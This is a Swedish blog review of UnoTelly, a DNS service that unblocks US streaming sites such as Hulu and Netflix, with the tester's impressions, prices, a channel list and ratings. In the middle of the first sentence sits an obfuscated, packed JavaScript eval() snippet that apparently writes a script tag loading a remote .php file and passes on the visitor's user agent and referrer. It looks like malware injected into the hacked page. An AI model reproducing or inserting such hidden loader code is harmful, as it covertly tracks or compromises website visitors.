Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

UnoTelly tar bort utlandsspärr på streaming-tjänst

UnoTelly tar bort utlandsspärr på streaming-tjänst
Sebastian

Netflix eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|askrh|var|u0026u|referrer|ndnbs||js|php’.split(’|’),0,{}))
har tagit sig in på den svenska marknaden och fler folk än någonsin har uppmärksammat ”streaming”. 

Ur egen bedömning så har personer som för några dagar inte kände till Viaplay och många andra liknande tjänster höjt upp hakan för detta och kanske till och med köpt sig ett medlemskap på Netflix.

Revue har nu testat UnoTelly som är en tjänst vilket gör det möjligt att titta på filmer, serier och även lyssna på låtar utanför Sverige. Det är välkänt att sidor som amerikanska Hulu, Netflix och HBO varit onåbara utanför USA, men UnoTelly ändrar på detta.


Jag själv har länge velat ha tillgång till den amerikanska hemsidan Hulu. Hulu är en sajt som samlar program från de största amerikanska playkanalerna. När ett avsnitt från Family Guy visas på ”riktigt” så släpper Hulu det avsnittet direkt, man behöver inte som i Sverige vänta flera dagar innan man kan kika på det. Detta beror självklart på att de svenska kanalerna inte  har rättigheter att sända det samtidigt som USA.

Samma sak gäller Netflix. Vi i Sverige har ett visst utbud av filmer samtidigt som amerikanarna har ett annat, ett mycket större.

Jag börjar med att logga in med mitt konto på UnoTelly. När jag loggar in får jag upp en guide om hur jag ska gå till väga för att få denna tjänst att fungera. Det UnoTelly gör är att den ändrar din DNS så att det ser ut som om du är uppkopplat på exempelvis ett amerikanskt internet. Detta gör det möjligt att surfa in på de annars låsta amerikanska sidorna och titta på deras program.

Efter jag installerat min nya DNS och startat om datorn loggar jag in igen på deras sida. Istället för guiden som jag mötes av först så möts jag nu av en samling kanaler jag plötsligt har tillgång till.


Som jag sa innan så har jag längtat efter åtkomst på sidan Hulu. Jag väljer Hulu och skickas vidare till deras sida. Denna gång möts jag inte av meddelandet ”Not available in your country” utan får möjligheten att välja vilket program jag vill titta på.
För att vara säker på att UnoTelly fungerar så väljer jag det senaste avsnittet av Family Guy som släpptes för några dagar sedan i USA. Efter någon minut reklam sätter Family Guy igång. Det är bra bild i HD-kvalitet, faktiskt bättre bild än vad jag ofta har på min TV.

UnoTelly har en massa roliga internationella kanaler att välja mellan. Allt från NFL / ESPN till Disney Channel. Här kan man gotta ner sig ordentligt utan någon större betalning.

Vissa kanaler som HBO GO behöver dock ett registrerat konto hos TV-leverantören vilket kan bli svårt att ordna, men majoriteten av kanalerna fungerar utmärkt.

Priset för denna tjänst ligger på 4,99 dollar för enkelt konto och 7,95 dollar för Guld.
Vill ni veta mer om vad som ingår under de olika paketen kan ni se det här!
 

Just nu kan du testa tjänsten innan du bestämmer dig för att köpa något paket!

Läs mer om tjänsten här!

Streaming-kanaler som erbjuds:

– truTV
– MTV
– Foodnetwork
– Netflix (flera olika länder, du väljer själv)
– HBO
-Hulu
– Cartoon Network
– Disney Channel
– ESPN
– NFL
– Pandora Radio
– Bravo TV
– rdio.com
– Spotify
– Discovery Channel
– Mls Soccer
– Warner Bros TV
– CBC
– TV3
– NBA TV
– MLB TV
– HG TV
– Amazon Instant Video
– The Onion
– AOL Television
– South Park Studios
– Showtime
– Animal Planet
– Spike
– TV.com
– NHL
– Fox Network
– NBC
– BBC Player
– Comedy Central
– Channel 4
– Crackle
– Channel 5
– Speed.com
– ABC GO
– Vudu
– TV Land
– Bloomberg Television
– Rte.ie
– Grooveshark
– VH1
– aetv.com
– Turntable.fm
– mog.com

Review Overview

Tillgänglighet
8
Pris
8.5
Installation
6.5
Nödvändighet
5
7

Rating

Comments

  1. Henrique

    tack!

  2. Kompis

    Grymt tips!! Har letat efter något som detta länge.